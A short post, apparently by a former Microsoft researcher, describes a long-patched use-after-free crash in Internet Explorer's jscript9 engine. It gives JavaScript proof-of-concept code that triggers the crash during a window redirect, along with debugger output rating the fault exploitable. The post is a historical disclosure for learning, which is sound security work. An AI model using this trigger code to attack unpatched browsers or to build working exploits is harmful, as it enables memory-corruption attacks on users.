I found that opening a new window, saving a reference to opener in Math, and then enumerating the window object with for..in in a setTimeout just as the server redirect fired caused a crash rated EXPLOITABLE in jscript9. The key to making the crash exploitable rather than just a simple crash was storing the opener reference in Math and using setTimeout for the enumeration — a tip shared by Gareth Heyes.
// Parent page. Assumes a <textarea id="tricked_TA"> exists on this page and that
// "redirect.aspx" is a server page that waits briefly and then issues a redirect.
var win;

function main()
{
    // Open the child window; the server-side redirect navigates it away while
    // the timers scheduled below are still pending.
    win = window.open("redirect.aspx");
    // Runs inside the child: stash a reference to the opener on the Math object,
    // then 100 ms later call the opener's forIn() on the child's window object.
    win.setTimeout('Math.op=opener;setTimeout(\'Math.op.forIn(window);\',100);', 1000);
}

function forIn(obj)
{
    var value;
    // Enumerate every property of obj (here the child window) and log it to the textarea.
    for (var i in obj) {
        if (i == obj) continue;
        try { value = (obj)[i] + ""; }
        catch (e) { value = "NO_ACCESS"; }
        document.getElementById("tricked_TA").value += i + " = " + value + "\n";
    }
}
The fault landed at heap address 0x31e8506a — a DEP violation in freed memory called from JSCRIPT9!JsVarToExtension+0x3c. The debugger rated it EXPLOITABLE as a software NX fault in an invalid/freed block, indicating potential control over the execution pointer via the heap.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.